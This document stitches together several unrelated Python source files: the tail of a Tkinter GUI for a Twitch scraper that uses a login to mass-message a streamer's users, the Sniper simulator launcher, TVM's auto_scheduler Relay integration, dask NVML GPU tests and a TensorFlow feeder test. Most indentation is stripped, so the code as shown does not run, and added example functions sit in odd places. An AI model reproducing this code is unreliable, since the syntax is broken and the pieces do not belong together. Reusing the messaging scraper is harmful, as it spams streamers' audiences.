        streamerError.configure(background='#404040', fg='#FFFFFF')
        streamerError.grid(row=7, column=1)
        return  # no streamer entered, nothing to scrape
    message = streamermessage.get("1.0", END)
    userDelay = messageDelay.get()
    print("Collected user input values")
    panhandle_thread = threading.Thread(target=executeScrape, name="Scraper",
                                        args=[username.get(), password.get(), streamerName, message, userDelay])
panhandle_thread.start()
print("Scraper for {} is now running in the background.".format(streamerName))
print("Message is: {}".format(message))
print("Delay between users is {} users".format(userDelay))
# Button to start scraping
bitchBtn = Button(root, text="Start Scraping!", command=startScrape, padx=30,\
relief=RAISED, cursor="hand2")
bitchBtn.grid(row=6, column=1)
# Message to send to streamer
streamermessageLabel = Label(root, text="Enter a message", pady=10)
streamermessageLabel.configure(background='#404040', fg='#FFFFFF')
streamermessageLabel.grid(row=7, column=0)
streamermessage = Text(root, height=5)
streamermessage.grid(row=8, column=0)
# Message delay slider
streamermessageLabel = Label(root, text="Select the user delay between messages", pady=10)
streamermessageLabel.configure(background='#404040', fg='#FFFFFF')
streamermessageLabel.grid(row=9, column=0)
messageDelay = Scale(root, from_=2, to=15, orient=HORIZONTAL)
messageDelay.grid(row=10, column=0)
root.mainloop()
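
# Headless sketch (illustrative, not part of application.py above): invoking the same
# panhandler.scrape call the GUI wires up, without Tk. The scrape() signature is
# inferred from executeScrape() above; every argument value here is an assumption.
def example_headless_scrape():
    worker = threading.Thread(target=scrape, name="Scraper",
                              args=["my_user", "my_password", "some_streamer", "hello chat!", 5])
    worker.start()
    worker.join()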
|
run_sniper.py
|
import sys, os, time, subprocess, threading, tempfile, sniper_lib
def Tee(filename, prefix = ''):
open(filename, 'w').close() # Make sure is writeable and empty
obj = subprocess.Popen(['bash', '-c', 'while read line; do echo "%s"$line; echo $line >> %s; done' % (prefix, filename)], stdin = subprocess.PIPE)
return obj.stdin.fileno()
def __run_program_redirect(app_id, program_func, program_arg, outputdir, run_id = 0):
prefix_fd = Tee(os.path.join(outputdir, 'benchmark-app%d-run%d.log' % (app_id, run_id)), '[app%d] ' % app_id)
os.dup2(prefix_fd, sys.stdout.fileno())
os.dup2(prefix_fd, sys.stderr.fileno())
program_func(program_arg)
def run_program_redirect(app_id, program_func, program_arg, outputdir, run_id = 0):
import multiprocessing # module does not exist in Python <= 2.5, import only when needed
proc = multiprocessing.Process(target = __run_program_redirect, args = (app_id, program_func, program_arg, outputdir, run_id))
proc.start()
proc.join()
def run_program_repeat(app_id, program_func, program_arg, outputdir):
global running
run_id = 0
while running:
print '[RUN-SNIPER] Starting application', app_id
run_program_redirect(app_id, program_func, program_arg, outputdir, run_id)
print '[RUN-SNIPER] Application', app_id, 'done'
time.sleep(1)
run_id += 1
def run_multi(snipercmd, applications, repeat = False, outputdir = '.'):
global running
running = True
p_sniper = subprocess.Popen([ 'bash', '-c', snipercmd ])
threads = []
for app in applications:
t = threading.Thread(target = repeat and run_program_repeat or run_program_redirect,
args = (app['app_id'], app['func'], app['args'], outputdir))
threads.append(t)
for t in threads:
t.start()
p_sniper.wait()
running = False # Simulator has ended, signal the benchmarks to stop restarting
time.sleep(2)
# Clean up benchmarks
sniper_lib.kill_children()
for t in threads:
t.join()
return p_sniper.returncode
# Determine libstdc++.so used by default by pin_sim.so using ldd
# Should take into account the current LD_LIBRARY_PATH
def get_cxx_inuse(sim_root, clear_ldlibpath = False):
pin_sim = '%s/lib/pin_sim.so' % sim_root
try:
ldd_out_name = tempfile.NamedTemporaryFile(delete = False).name
ldlpsave = None
if clear_ldlibpath:
ldlpsave = os.environ.get('LD_LIBRARY_PATH', None)
if ldlpsave:
del os.environ['LD_LIBRARY_PATH']
os.system('ldd %s > %s 2> /dev/null' % (pin_sim, ldd_out_name))
if ldlpsave:
os.environ['LD_LIBRARY_PATH'] = ldlpsave
ldd_out = open(ldd_out_name).read()
os.unlink(ldd_out_name)
libcxx_path = os.path.dirname([ line.split()[2] for line in ldd_out.split('\n') if 'libstdc++.so.6' in line ][0])
except Exception, e:
print >> sys.stderr, `e`
return None
return libcxx_path
# Find libstdc++.so version number in a given path
def get_cxx_version(path):
filename = os.path.join(path, 'libstdc++.so.6')
if os.path.exists(filename):
realname = os.path.realpath(filename)
try:
version = int(realname.split('.')[-1])
return version
except Exception, e:
print >> sys.stderr, `e`
return 0
else:
return 0
def get_cxx_override(sim_root, pin_home, arch):
# Find which libstdc++.so is newer: either the system default one (with or without the LD_LIBRARY_PATH), or the Pin one
cxx_versions = [get_cxx_inuse(sim_root), get_cxx_inuse(sim_root, clear_ldlibpath = True), '%s/%s/runtime/cpplibs' % (pin_home, arch)]
if 'BENCHMARKS_ROOT' in os.environ:
cxx_versions.append('%s/libs' % os.environ['BENCHMARKS_ROOT'])
cxx_override = sorted(map(lambda x:(get_cxx_version(x),x), cxx_versions), key=lambda x:x[0])[-1][1]
return cxx_override
# LD_LIBRARY_PATH setup
#
# There are many different versions of LD_LIBRARY_PATH to consider:
# - the initial LD_LIBRARY_PATH which will affect Python when running this script
# - the application being simulated (PIN_APP_LD_LIBRARY_PATH):
# SNIPER_APP_LD_LIBRARY_PATH, defaults to original LD_LIBRARY_PATH
# - the Sniper pintool or standalone executable and Pin itself (PIN_VM_LD_LIBRARY_PATH):
# Pin runtime libraries, system libstdc++ (depending on version),
# can be extended by setting SNIPER_SIM_LD_LIBRARY_PATH
# - scripts being run inside the simulator (SNIPER_SCRIPT_LD_LIBRARY_PATH): original LD_LIBRARY_PATH
# (e.g. mcpat when running powertrace.py)
def setup_env(sim_root, pin_home, arch, standalone = False):
env = dict(os.environ)
ld_library_path_orig = env.get('LD_LIBRARY_PATH', '')
# Construct Sniper/Pintool LD_LIBRARY_PATH
ld_library_path = []
# Make sure that our version of Python is used, not the system version normally found in cxx_override
ld_library_path.append('%s/python_kit/%s/lib' % (sim_root, arch))
cxx_override = get_cxx_override(sim_root, pin_home, arch)
ld_library_path.append(cxx_override)
if not standalone:
ld_library_path.append('%s/%s/runtime/cpplibs' % (pin_home, arch))
ld_library_path.append('%s/%s/runtime' % (pin_home, arch))
if 'SNIPER_SIM_LD_LIBRARY_PATH' in os.environ:
ld_library_path.append(os.environ['SNIPER_SIM_LD_LIBRARY_PATH'])
env['LD_LIBRARY_PATH'] = ':'.join(ld_library_path)
env['PIN_LD_RESTORE_REQUIRED'] = '1'
env['PIN_VM_LD_LIBRARY_PATH'] = env['LD_LIBRARY_PATH'] # Pin VM and Pintool (Sniper) use LD_LIBRARY_PATH as modified above
# Application LD_LIBRARY_PATH
if 'SNIPER_APP_LD_LIBRARY_PATH' in env:
env['PIN_APP_LD_LIBRARY_PATH'] = env['SNIPER_APP_LD_LIBRARY_PATH'] # Application uses explicit LD_LIBRARY_PATH
del env['SNIPER_APP_LD_LIBRARY_PATH']
else:
env['PIN_APP_LD_LIBRARY_PATH'] = ld_library_path_orig # Application uses original LD_LIBRARY_PATH
# Scripts LD_LIBRARY_PATH
env['SNIPER_SCRIPT_LD_LIBRARY_PATH'] = ld_library_path_orig # Scripts running inside Sniper use original LD_LIBRARY_PATH
# Other environment variables
if 'SNIPER_APP_LD_PRELOAD' in env:
env['PIN_APP_LD_PRELOAD'] = env['SNIPER_APP_LD_PRELOAD']
del env['SNIPER_APP_LD_PRELOAD']
elif 'LD_PRELOAD' in env:
env['PIN_APP_LD_PRELOAD'] = env['LD_PRELOAD']
env['LD_PRELOAD'] = ''
env['PYTHONPATH'] = '%s/scripts:%s' % (sim_root, os.getenv('PYTHONPATH') or '')
env['SNIPER_ROOT'] = sim_root
env['GRAPHITE_ROOT'] = sim_root
return env
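
# Usage sketch (illustrative only, not part of run_sniper.py): build the simulation
# environment described in the LD_LIBRARY_PATH notes above and launch a command with
# it. The sim_root/pin_home paths and the command line are assumptions, not values
# taken from this repository.
if __name__ == '__main__':
  example_env = setup_env(sim_root = '/opt/sniper', pin_home = '/opt/pin', arch = 'intel64')
  subprocess.call(['bash', '-c', 'echo "environment prepared for Sniper"'], env = example_env)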
|
relay_integration.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=unused-variable,invalid-name
"""
Integrate auto_scheduler into relay. It implements the following items:
1. Extract search tasks from a relay program
2. Provide auto-scheduling for all TOPI compute functions
"""
import logging
import json
import threading
import tvm
from tvm import autotvm, te, transform
from tvm.ir.transform import PassContext
from tvm.runtime import convert_to_object
from tvm.te.tensor import ComputeOp, PlaceholderOp, Tensor
from tvm.tir import expr as _expr
from . import _ffi_api
from .compute_dag import ComputeDAG
from .dispatcher import DispatchContext
from .search_task import SearchTask
from .workload_registry import register_workload_tensors
logger = logging.getLogger("auto_scheduler")
def call_all_topi_funcs(mod, params, target):
"""Call all TOPI compute to extract auto_scheduler tasks in a Relay program"""
# pylint: disable=import-outside-toplevel
from tvm import relay
from tvm.relay.backend import graph_runtime_codegen
# Turn off AutoTVM config not found warnings
old_autotvm_silent = autotvm.GLOBAL_SCOPE.silent
autotvm.GLOBAL_SCOPE.silent = True
with transform.PassContext(
opt_level=3,
config={"relay.backend.use_auto_scheduler": True},
disabled_pass={"AutoSchedulerLayoutRewrite"},
):
opt_mod, _ = relay.optimize(mod, target, params)
grc = graph_runtime_codegen.GraphRuntimeCodegen(None, target)
grc.codegen(opt_mod["main"])
autotvm.GLOBAL_SCOPE.silent = old_autotvm_silent
def extract_tasks(
mod, params, target, target_host=None, hardware_params=None, include_simple_tasks=False
):
"""Extract tuning tasks from a relay program.
Parameters
----------
mod: tvm.IRModule or relay.function.Function
The module or function to tune
params: dict of str to numpy array
The associated parameters of the program
target: Union[tvm.target.Target, str]
The compilation target
target_host: Optional[Union[tvm.target.Target, str]]
The host compilation target
hardware_params : Optional[HardwareParams]
Hardware parameters used for the search tasks
include_simple_tasks: bool
Whether to extract simple tasks that do not include complicated ops.
Returns
-------
tasks: List[SearchTask]
The tasks in this network
weights: List[int]
The weight (i.e. the number of appearance) of extracted tasks
"""
# pylint: disable=import-outside-toplevel
from tvm import relay
if isinstance(target, str):
target = tvm.target.Target(target)
if isinstance(target_host, str):
target_host = tvm.target.Target(target_host)
# Run the compiler to collect all TOPI calls during compilation.
env = TracingEnvironment(
TracingMode.EXTRACT_TASK if include_simple_tasks else TracingMode.EXTRACT_COMPLEX_TASK_ONLY
)
with env:
# Wrap build call in a new thread to avoid the conflict
# between python's multiprocessing and tvm's thread pool
build_thread = threading.Thread(target=call_all_topi_funcs, args=(mod, params, target))
build_thread.start()
build_thread.join()
    # query the compile engine to get the number of occurrences of all tasks
engine = relay.backend.compile_engine.get()
use_count_dict = {}
for k, v in engine.items():
use_count_dict[k] = v.use_count
# create search tasks
tasks = []
weights = []
for wkl_key, ccache_key in env.wkl_key_to_ccache_key.items():
dag = ComputeDAG(wkl_key)
tasks.append(
SearchTask(
workload_key=wkl_key,
target=target,
target_host=target_host,
hardware_params=hardware_params,
)
)
weights.append(use_count_dict[ccache_key] + 1)
# clean the cached lowering results
engine.clear()
return tasks, weights
class TracingMode:
"""Two modes for tracing"""
EXTRACT_TASK = 0 # trace all topi calls to extract tasks
EXTRACT_COMPLEX_TASK_ONLY = 1 # same as EXTRACT_TASK but ignore the task without complex ops
PREPARE_LAYOUT_REWRITE = 2 # trace topi calls to prepare layout rewrite
class TracingEnvironment:
"""Global environment for tracing all topi function calls"""
current = None
def __init__(self, tracing_mode):
self.tracing_mode = tracing_mode
self.relay_disable_build_cache = "false"
self.wkl_key_to_ccache_key = {}
def __enter__(self):
TracingEnvironment.current = self
return self
def __exit__(self, exc_type, exc_val, exc_tb):
TracingEnvironment.current = None
def add_workload_key(self, workload_key, ccache_key):
"""Add the workload key of a search task
Parameters
----------
workload_key: str
The workload key of a task
ccache_key: CCacheKey
The corresponding ccache_key of the task
"""
self.wkl_key_to_ccache_key[workload_key] = ccache_key
@tvm._ffi.register_func("auto_scheduler.enter_layout_rewrite")
def enter_layout_rewrite():
"""Enter layout rewrite tracing environment"""
env = TracingEnvironment(TracingMode.PREPARE_LAYOUT_REWRITE)
env.__enter__()
@tvm._ffi.register_func("auto_scheduler.exit_layout_rewrite")
def exit_layout_rewrite():
"""Exit layout rewrite tracing environment"""
env = TracingEnvironment.current
env.__exit__(None, None, None)
def traverse_to_get_io_tensors(outs):
"""Traverse from a list of output tensors to get both input and output tensors
Parameters
----------
outs: List[Tensor]
The output tensors
Returns
-------
io_tensors: List[Tensor]
The input and output tensors
has_layout_free: bool
Whether the compute DAG has layout_free placeholders
"""
layout_free_ops = []
inputs = []
visited = set()
def traverse(t):
if t in visited:
return
if isinstance(t.op, PlaceholderOp):
inputs.append(t)
elif isinstance(t.op, ComputeOp):
if "layout_free_placeholders" in t.op.attrs:
layout_free_ops.append(t.op)
for x in t.op.input_tensors:
traverse(x)
visited.add(t)
for t in outs:
traverse(t)
has_layout_free = len(layout_free_ops) > 0
return inputs + list(outs), has_layout_free
@tvm._ffi.register_func("auto_scheduler.relay_integration.auto_schedule_topi_compute")
def auto_schedule_topi(outs, has_complex_op):
"""Use auto-scheduler to schedule any topi compute function.
Note: This is used internally for relay integration. Do
not use this as a general user-facing API.
Parameters
----------
outs: List[Tensor]
The output tensors of topi compute functions
has_complex_op: bool
Whether the topi compute function includes at least one complex op.
Returns
-------
sch: Optional[te.Schedule]
A tuned schedule or none (if not tuned) in the final build mode;
        An initial schedule in the tracing mode.
"""
# pylint: disable=import-outside-toplevel
from tvm import relay
io_tensors, has_layout_free = traverse_to_get_io_tensors(outs)
try:
dag = ComputeDAG(io_tensors)
except tvm.error.TVMError as err:
logger.info("Failed to create a ComputeDAG for auto_scheduler: %s", str(err))
return None
key = register_workload_tensors(dag.hash_key(), io_tensors)
# only enable layout rewrite for cpu / mali backend
target = tvm.target.Target.current()
enable_layout_rewrite_targets = ["cpu", "mali"]
enable_layout_rewrite = any(
enable_layout_rewrite_target in target.keys
for enable_layout_rewrite_target in enable_layout_rewrite_targets
)
env = TracingEnvironment.current
if env is None:
# in the final build mode
state = DispatchContext.current.query(target, key, has_complex_op, dag)
if state is None:
return None
schedule, _ = dag.apply_steps_from_state(state)
elif env.tracing_mode in [TracingMode.EXTRACT_TASK, TracingMode.EXTRACT_COMPLEX_TASK_ONLY]:
# in the task extraction mode
if has_complex_op or env.tracing_mode == TracingMode.EXTRACT_TASK:
engine = relay.backend.compile_engine.get()
ccache_key = engine.get_current_ccache_key()
env.add_workload_key(key, ccache_key)
schedule = te.create_schedule([x.op for x in outs])
elif env.tracing_mode == TracingMode.PREPARE_LAYOUT_REWRITE:
# in prepare_layout_rewrite mode
if enable_layout_rewrite and has_layout_free:
dispatch_ctx = DispatchContext.current
state = dispatch_ctx.query(target, key, has_complex_op, dag)
if state is None:
return None
# rewrite the layout and update the context for the new dag
dag = ComputeDAG(outs)
new_dag = dag.rewrite_layout_from_state(state)
new_key = json.dumps((new_dag.hash_key(),))
if new_key != key:
dispatch_ctx.update(target, new_key, state)
return te.create_schedule([x.op for x in outs])
else:
raise ValueError("Invalid tracing mode: " + env.tracing_mode)
return schedule
def tensor_no_check_call(self, *indices):
"""An indexing function without any check.
This is the same as `tvm.te.Tensor::__call__` except that the safety
check is removed.
"""
indices = convert_to_object(indices)
args = []
for x in indices:
if isinstance(x, _expr.PrimExpr):
args.append(x)
elif isinstance(x, _expr.IterVar):
args.append(x.var)
else:
raise ValueError("The indices must be expression")
return _expr.ProducerLoad(self, args)
def remove_index_check(tensor):
"""Remove the safety check in the indexing function for a tensor.
This is done by monkey patching its indexing function.
After removing the check, we are allowed to create a
temporary wrong IR and fix it later in other places.
Parameters
----------
tensor: Tensor
The tensor to remove index check.
"""
# Monkey patch the indexing function
tensor.__call__ = tensor_no_check_call.__get__(tensor, Tensor)
def rewrite_compute_body(compute_tensor, new_layout):
"""Rewrite the body of a ComputeOp according to a new layout of a placeholder"""
op = compute_tensor.op
# Get layout free placeholders
layout_free_placeholders = op.attrs["layout_free_placeholders"]
assert len(layout_free_placeholders) == 1, "Only support one layout free placeholder"
placeholder_op = layout_free_placeholders[0].op
# Rewrite the index expression in body
body = []
for b in op.body:
body.append(_ffi_api.RewriteIndexForNewLayout(placeholder_op, new_layout, b))
op_node = tvm.te._ffi_api.ComputeOp(op.name, op.tag, op.attrs, op.axis, body)
num = op_node.num_outputs
outputs = tuple(op_node.output(i) for i in range(num))
return outputs[0] if num == 1 else outputs
def is_auto_scheduler_enabled():
"""Return whether the auto-scheduler is enabled.
    Returns
    -------
enabled: bool
Whether the auto-scheduler is enabled
"""
return PassContext.current().config.get("relay.backend.use_auto_scheduler", False)
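
# Usage sketch (illustrative, not part of this module): extracting auto_scheduler tasks
# from a small Relay workload. The resnet-18 test network and the "llvm" target are
# assumptions chosen only for demonstration.
if __name__ == "__main__":
    from tvm.relay import testing

    example_mod, example_params = testing.resnet.get_workload(num_layers=18, batch_size=1)
    example_tasks, example_weights = extract_tasks(example_mod["main"], example_params, "llvm")
    for example_task, example_weight in zip(example_tasks, example_weights):
        logger.info("task %s appears %d time(s)", example_task.workload_key, example_weight)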
|
test_nvml.py
|
import multiprocessing as mp
import os
import pytest
pytestmark = pytest.mark.gpu
pynvml = pytest.importorskip("pynvml")
import dask
from distributed.diagnostics import nvml
from distributed.utils_test import gen_cluster
def test_one_time():
if nvml.device_get_count() < 1:
pytest.skip("No GPUs available")
output = nvml.one_time()
assert "memory-total" in output
assert "name" in output
assert len(output["name"]) > 0
def test_enable_disable_nvml():
try:
pynvml.nvmlShutdown()
except pynvml.NVMLError_Uninitialized:
pass
else:
nvml.nvmlInitialized = False
with dask.config.set({"distributed.diagnostics.nvml": False}):
nvml.init_once()
assert nvml.nvmlInitialized is False
with dask.config.set({"distributed.diagnostics.nvml": True}):
nvml.init_once()
assert nvml.nvmlInitialized is True
def run_has_cuda_context(queue):
try:
assert not nvml.has_cuda_context()
import numba.cuda
numba.cuda.current_context()
assert nvml.has_cuda_context() == 0
queue.put(None)
except Exception as e:
queue.put(e)
def test_has_cuda_context():
if nvml.device_get_count() < 1:
pytest.skip("No GPUs available")
# This test should be run in a new process so that it definitely doesn't have a CUDA context
# and uses a queue to pass exceptions back
ctx = mp.get_context("spawn")
queue = ctx.Queue()
p = ctx.Process(target=run_has_cuda_context, args=(queue,))
p.start()
p.join() # this blocks until the process terminates
e = queue.get()
if e is not None:
raise e
def test_1_visible_devices():
if nvml.device_get_count() < 1:
pytest.skip("No GPUs available")
os.environ["CUDA_VISIBLE_DEVICES"] = "0"
output = nvml.one_time()
h = nvml._pynvml_handles()
assert output["memory-total"] == pynvml.nvmlDeviceGetMemoryInfo(h).total
@pytest.mark.parametrize("CVD", ["1,0", "0,1"])
def test_2_visible_devices(CVD):
if nvml.device_get_count() < 2:
pytest.skip("Less than two GPUs available")
os.environ["CUDA_VISIBLE_DEVICES"] = CVD
idx = int(CVD.split(",")[0])
h = nvml._pynvml_handles()
h2 = pynvml.nvmlDeviceGetHandleByIndex(idx)
s = pynvml.nvmlDeviceGetSerial(h)
s2 = pynvml.nvmlDeviceGetSerial(h2)
assert s == s2
@gen_cluster()
async def test_gpu_metrics(s, a, b):
if nvml.device_get_count() < 1:
pytest.skip("No GPUs available")
h = nvml._pynvml_handles()
assert "gpu" in a.metrics
assert (
s.workers[a.address].metrics["gpu"]["memory-used"]
== pynvml.nvmlDeviceGetMemoryInfo(h).used
)
assert "gpu" in a.startup_information
assert (
s.workers[a.address].extra["gpu"]["name"]
== pynvml.nvmlDeviceGetName(h).decode()
)
@gen_cluster()
async def test_gpu_monitoring_recent(s, a, b):
if nvml.device_get_count() < 1:
pytest.skip("No GPUs available")
h = nvml._pynvml_handles()
res = await s.get_worker_monitor_info(recent=True)
assert (
res[a.address]["range_query"]["gpu_utilization"]
== pynvml.nvmlDeviceGetUtilizationRates(h).gpu
)
assert (
res[a.address]["range_query"]["gpu_memory_used"]
== pynvml.nvmlDeviceGetMemoryInfo(h).used
)
assert res[a.address]["gpu_name"] == pynvml.nvmlDeviceGetName(h).decode()
assert res[a.address]["gpu_memory_total"] == pynvml.nvmlDeviceGetMemoryInfo(h).total
@gen_cluster()
async def test_gpu_monitoring_range_query(s, a, b):
if nvml.device_get_count() < 1:
pytest.skip("No GPUs available")
res = await s.get_worker_monitor_info()
ms = ["gpu_utilization", "gpu_memory_used"]
for w in (a, b):
assert all(res[w.address]["range_query"][m] is not None for m in ms)
assert res[w.address]["count"] is not None
assert res[w.address]["last_time"] is not None
|
feeder_test.py
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tf.contrib.training.feeder."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import portpicker
from tensorflow.contrib.training.python.training import feeder as feeder_lib
from tensorflow.python.client import session as session_lib
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes as dtypes_lib
from tensorflow.python.framework import ops
from tensorflow.python.platform import test
from tensorflow.python.training import coordinator
from tensorflow.python.training import queue_runner_impl
from tensorflow.python.training import server_lib
_PORTS = set()
def _pick_unused_port():
"""For some reason portpicker returns the same port sometimes."""
while True:
p = portpicker.pick_unused_port()
if p not in _PORTS:
break
_PORTS.add(p)
return p
class FeederThread(object):
# Helper class, wrapping a feeder and making sure it's located on the proper
# device
def __init__(self, test_case, coord, servers, job, task_num, prefix=''):
self.graph = ops.Graph()
self.coord = coord
self.server = servers[job][task_num]
self.remote_devices = []
    # Just because we do tf.session(X) doesn't mean ops will be located
# on the X task; wrapping all feeder creation/interaction in an
    # extra tf.device(X) ensures that any ops that don't provide
# their own tf.device() wrapper will be placed on the correct "local"
# feeder task. A session can and does put ops that have no device
# assignment onto any of the tasks it knows about, not just the
# task passed as its target= argument!
self.device = '/job:%s/task:%d' % (job, task_num)
self.prefix = prefix
self.thread = test_case.checkedThread(target=self._feed_thread)
with self.graph.as_default(), ops.device(self.device):
self.feeder = feeder_lib.Feeder(
[dtypes_lib.string, dtypes_lib.string], [[], []], capacity=1)
self.feeder.set_many_fed_tensors(self._get_feed_values())
def _get_feed_values(self):
# Return some feeding strings, possibly prefixed.
return [
constant_op.constant(
['%s%s' % (self.prefix, x) for x in ['a0', 'a1', 'a2']]),
constant_op.constant(
['%s%s' % (self.prefix, x) for x in ['b0', 'b1', 'b2']])
]
def add_remote_device(self, dev):
with self.graph.as_default(), ops.device(self.device):
self.feeder.add_remote_device(dev)
def start(self):
self.thread.start()
self.feeder.wait_until_feeding() # wait until it's up & feeding
if self.coord.should_stop():
self.coord.join() # rethrows errors encountered in run_feeding_forever
def join(self):
self.thread.join()
def _session(self):
return session_lib.Session(target=self.server.target)
def _feed_thread(self):
with self.coord.stop_on_exception():
with self.graph.as_default(), ops.device(self.device):
self.feeder.run_feeding_forever(self._session, self.coord)
class FeederTest(test.TestCase):
# Tests for Feeder
def _create_local_cluster(self, **kargs):
"""Creates a local cluster."""
cluster_dict = {}
for (k, v) in kargs.items():
cluster_dict[k] = [
'localhost:%d' % _pick_unused_port() for _ in range(v)
]
# Launch servers:
servers = {}
for (k, v) in kargs.items():
servers[k] = [
server_lib.Server(
cluster_dict, job_name=k, task_index=idx, start=True)
for idx in range(v)
]
return servers
def testFeederActsLikeQueue(self):
# Tests that a feeder acts like a queue
feeder = feeder_lib.Feeder(
dtypes=[dtypes_lib.string, dtypes_lib.string],
shapes=[[], []],
capacity=10)
feeder.set_many_fed_tensors([
constant_op.constant(['a0', 'a1', 'a2']),
constant_op.constant(['b0', 'b1', 'b2'])
])
out_a, out_b = feeder.get_fed_tensors()
with self.test_session() as session:
coord = coordinator.Coordinator()
queue_runner_impl.start_queue_runners(session, coord=coord)
a, b = session.run([out_a, out_b])
self.assertEquals(b'a0', a)
self.assertEquals(b'b0', b)
a = session.run(out_a) # Omit b!
self.assertEquals(b'a1', a)
a, b = session.run([out_a, out_b])
self.assertEquals(b'a2', a)
self.assertEquals(b'b2', b) # queued together
a, b = session.run([out_a, out_b]) # loops around
self.assertEquals(b'a0', a)
self.assertEquals(b'b0', b) # queued together
coord.request_stop()
coord.join()
def testFeederSeparateThread(self):
# Start a feeder on a separate thread, but with a shared local queue
servers = self._create_local_cluster(worker=1)
coord = coordinator.Coordinator()
feed_thread = FeederThread(self, coord, servers, 'worker', 0)
feed_thread.start()
with ops.Graph().as_default():
with ops.device('/job:worker/task:0'):
feeder = feeder_lib.Feeder(
dtypes=[dtypes_lib.string, dtypes_lib.string],
shapes=[[], []],
capacity=1)
out_a, out_b = feeder.get_fed_tensors()
with session_lib.Session(servers['worker'][0].target) as session:
a, b = session.run([out_a, out_b])
self.assertEquals(b'a0', a)
self.assertEquals(b'b0', b)
a = session.run(out_a) # Omit b!
self.assertEquals(b'a1', a)
coord.request_stop()
coord.join()
feed_thread.join()
def testOneEachFeeding(self):
# One feeder, one consumer
servers = self._create_local_cluster(consumer=1, feeder=1)
coord = coordinator.Coordinator()
feeder_thread = FeederThread(self, coord, servers, 'feeder', 0)
feeder_thread.add_remote_device('/job:consumer/task:0')
feeder_thread.start()
with ops.Graph().as_default():
with ops.device('/job:consumer/task:0'):
feeder = feeder_lib.Feeder(
dtypes=[dtypes_lib.string, dtypes_lib.string],
shapes=[[], []],
capacity=1)
out_a, out_b = feeder.get_fed_tensors()
with session_lib.Session(servers['consumer'][0].target) as session:
a, b = session.run([out_a, out_b])
self.assertEquals(b'a0', a)
self.assertEquals(b'b0', b)
a = session.run(out_a) # Omit b!
self.assertEquals(b'a1', a)
coord.request_stop()
coord.join()
feeder_thread.join()
def testMultipleProducersAndConsumers(self):
# Three feeders, three consumers.
servers = self._create_local_cluster(consumer=3, feeder=3)
coord = coordinator.Coordinator()
# Start the three feeders:
f0 = FeederThread(self, coord, servers, 'feeder', 0, prefix='feed0_')
f0.add_remote_device('/job:consumer/task:0')
f0.add_remote_device('/job:consumer/task:1')
f0.start()
f1 = FeederThread(self, coord, servers, 'feeder', 1, prefix='feed1_')
f1.add_remote_device('/job:consumer/task:2')
f1.add_remote_device('/job:consumer/task:0')
f1.start()
f2 = FeederThread(self, coord, servers, 'feeder', 2, prefix='feed2_')
f2.add_remote_device('/job:consumer/task:1')
f2.add_remote_device('/job:consumer/task:2')
f2.start()
# Three consumers.
def _run_consumer(task, expected_keys):
server = servers['consumer'][task]
# Runs until everything in expected_keys has been seen at least once;
# fails if any prefix not in expected_keys shows up
with ops.Graph().as_default(), ops.device('/job:consumer/task:%d' % task):
feeder = feeder_lib.Feeder(
dtypes=[dtypes_lib.string, dtypes_lib.string],
shapes=[[], []],
capacity=1)
out_a, out_b = feeder.get_fed_tensors()
counts = collections.Counter()
with session_lib.Session(server.target) as sess:
while True:
a, b = sess.run([out_a, out_b])
counts[a[:-1]] += 1
counts[b[:-1]] += 1
self.assertTrue(a[:-1] in expected_keys)
self.assertTrue(b[:-1] in expected_keys)
if all(counts[k] > 0 for k in expected_keys):
return
_run_consumer(0, [b'feed0_a', b'feed0_b', b'feed1_a', b'feed1_b'])
_run_consumer(1, [b'feed0_a', b'feed0_b', b'feed2_a', b'feed2_b'])
_run_consumer(2, [b'feed1_a', b'feed1_b', b'feed2_a', b'feed2_b'])
coord.request_stop()
coord.join()
f0.join()
f1.join()
f2.join()
def testAddRemoteReplicas(self):
with ops.Graph().as_default():
for idx in range(3):
with ops.name_scope('replica_%d' % idx):
feeder = feeder_lib.Feeder(
dtypes=[dtypes_lib.string, dtypes_lib.string],
shapes=[[], []],
capacity=10)
feeder.add_remote_replicas(
'consumer',
replica_count=3,
feeder_task_num=idx,
replicas_per_feeder=2,
base_device_spec='/device:cpu:0')
# Examine ops...
op_types_by_scope_and_device = collections.defaultdict(
lambda: collections.defaultdict(collections.Counter))
for op in ops.get_default_graph().get_operations():
scope = '/'.join(op.name.split('/')[:-1])
dev = op.device
op_types_by_scope_and_device[scope][dev][op.type] += 1
expected_ops = collections.Counter(
{'QueueEnqueueV2': 1, 'FIFOQueueV2': 1})
expected_enq_devices = [('replica_0', [
'/job:consumer/replica:0/device:cpu:0',
'/job:consumer/replica:1/device:cpu:0',
]), ('replica_1', [
'/job:consumer/replica:2/device:cpu:0',
'/job:consumer/replica:0/device:cpu:0',
]), ('replica_2', [
'/job:consumer/replica:1/device:cpu:0',
'/job:consumer/replica:2/device:cpu:0',
])]
for scope, devs in expected_enq_devices:
for dev in devs:
self.assertEqual(expected_ops,
op_types_by_scope_and_device[scope][dev])
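
# Device-pinning sketch (illustrative, not part of the tests above): the pattern the
# FeederThread comment describes -- wrap feeder construction in an explicit ops.device()
# so its ops land on the intended task rather than wherever the session places
# unassigned ops. The job/task names below are assumptions.
def example_build_pinned_feeder():
  with ops.Graph().as_default(), ops.device('/job:feeder/task:0'):
    f = feeder_lib.Feeder([dtypes_lib.string], [[]], capacity=1)
    f.set_many_fed_tensors([constant_op.constant(['x0', 'x1', 'x2'])])
    f.add_remote_device('/job:consumer/task:0')
    return f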
if __name__ == '__main__':
test.main()
|
sftp_test.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
